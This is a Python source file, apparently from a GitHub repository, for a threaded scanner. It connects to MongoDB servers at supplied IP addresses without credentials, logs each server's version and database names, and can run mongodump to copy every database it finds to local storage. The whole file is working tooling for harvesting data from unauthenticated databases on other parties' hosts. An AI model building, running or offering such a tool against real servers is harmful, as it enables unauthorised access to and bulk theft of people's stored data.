-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathmongo.py
107 lines (91 loc) · 3.41 KB
/
mongo.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
from subprocess import Popen, check_call
from typing import NamedTuple, List
import threading
import os
import time
from queue import Queue
from pymongo import MongoClient
from pymongo.errors import ConnectionFailure, ConfigurationError
from writer import write_log
DEFAULT_TIMEOUT = 10000
class ConnectionWorkerOptions(NamedTuple):
out: str
file: str
dump: bool
class ConnectionWorker(threading.Thread):
def __init__(
self, queue: Queue, id: int, options: ConnectionWorkerOptions
):
threading.Thread.__init__(self)
self.queue = queue
self.id = id
self.options = options
def close(self, client):
client.close()
def test_open_connection(self, client, ip: str) -> (List[str], str):
try:
info = client.server_info()
version = info.get("version", "")
dbs = client.database_names()
return dbs, version
except ConnectionFailure:
print(f"[{ip}]: connection failed")
return None, None
def dump_databases(self, ip: str, dbs: List[str]) -> List[str]:
base_ip_dir = f"{self.options.out}/{ip}"
timestr = time.strftime("%Y-%m-%d-%H%M%S")
dumped = []
if dbs is None or len(dbs) == 0:
return
try:
# Create ip dir if not exists
if not os.path.exists(base_ip_dir):
os.makedirs(base_ip_dir)
except FileExistsError:
print(
f"[{ip}]: File exists error, check if you got the same ip in yer input"
)
for db in dbs:
cmd = f"mongodump --quiet --host {ip} -d {db} -o {base_ip_dir}/{db}-{timestr}"
# why check_call instead os Popen ?
# We want to wait until it exits, we don't wanna spawn a new sh
# cos it complicates things up. check_call will wait until the command
# finishes and gives back the return code
retcall = check_call(cmd.split())
if retcall == 0:
dumped.append(db)
return dumped
def log_opened_connection(
self, ip: str, version: str, dbs: List[str], dumped_dbs: List[str]
):
dumped_str = ""
if len(dumped_dbs) > 1:
dumped_str = (
"\n".join([f"[{ip}]: Dumped '{d_db}'" for d_db in dumped_dbs])
+ "\n"
)
write_log(
f"{self.options.out}/{self.options.file}",
f"[{ip}]: opened connection.\n"
f"\t├─ Version: {version}\n"
f"\t└─ Databases: {dbs}\n" + f"{dumped_str}\n"
f"------------------------------------------------\n",
)
def run(self):
while True:
ip = self.queue.get()
print(f"[Worker {self.id}] => Started {ip}")
try:
client = MongoClient(
ip, serverSelectionTimeoutMS=DEFAULT_TIMEOUT
)
dbs, version = self.test_open_connection(client, ip)
if dbs is not None and version is not None:
dumped_dbs = []
if self.options.dump:
dumped_dbs = self.dump_databases(ip, dbs)
self.log_opened_connection(ip, version, dbs, dumped_dbs)
self.close(client)
self.queue.task_done()
except ConfigurationError:
self.queue.task_done()